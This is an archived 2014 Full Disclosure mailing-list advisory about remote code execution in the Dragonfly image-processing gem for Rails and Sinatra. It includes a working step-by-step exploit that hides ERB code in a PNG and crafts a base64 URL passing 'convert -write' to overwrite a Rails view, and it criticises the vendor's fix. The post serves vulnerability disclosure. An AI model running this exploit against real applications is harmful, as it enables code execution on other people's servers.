lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <53FBAE28.8030900@room.me>
Date: Mon, 25 Aug 2014 23:44:08 +0200
From: leex <leex@...m.me>
To: fulldisclosure@...lists.org
Subject: [FD] RCE in dragonfly gem

RCE in the Dragonfly gem for image uploading & processing in
rails/sinatra, in version 1.0.5. (https://github.com/markevans/dragonfly)

The underlaying vulnerability is that you can pass arbitrary commands to
imagemagicks convert, thus granting arbitrary read/write for the
filesystem. Additionally the -process flag seems to be able to load
custom modules, which might result in execution of arbitrary files.

Here is a description of _one_ way of how to abuse the RCE vulnerability:
$cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$wc exploit.rb
 3 13 63 exploit.rb
char length needs to be multiple of 3 (21x3 = 63) because every pixel in
a png
will contain 1 byte
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
test that everything went well:
$convert exploit.png test.rgb
diff should not show any diffs:
$diff -v test.rgb exploit.rb
upload the picture
copy the image url
eg:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0
open pry or irb and run:
Base64.decode64
"W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"
=>
"[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"thumb\",\"400x200#\"]]"
Base64.strict_encode64
[[\"f\",\"2014/08/10/7i7j215lhg_exploit.png\"],[\"p\",\"convert\",\"-write
rgb:/path/to/rails/app/views/photos/index.html.erb\"]]"
=>
"W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="
go to your browser and request:
http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0=
and then: http://domain.tld/photos/
which will open app/views/photos/index.html.erb and spawn a pry on the
terminal
you called rails server from.
Of course you can use different imagemagick flags than "write" to
achieve the same code execution. So this would really call for a
whitelist that restricts the commands that can be send to imagemagick.

The author was contacted and committed "fixes" (dragonfly version 1.0.6,
https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e).
The main fix seems to be "'rename dos_prevention' to 'verify urls
(recommended)'". Needless to say, many websites out there will still
disable the verification for ease of deployment of e.g. javascript that
requests thumbnail versions of images. Note that this vulnerability is
still exploitable if the attacker is unable to upload images, by using
the generators to "draw" arbitrary images by imagemagick commands.

cheers,
coco & leex
http://hexgolems.com/fd/dragonfly.txt

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ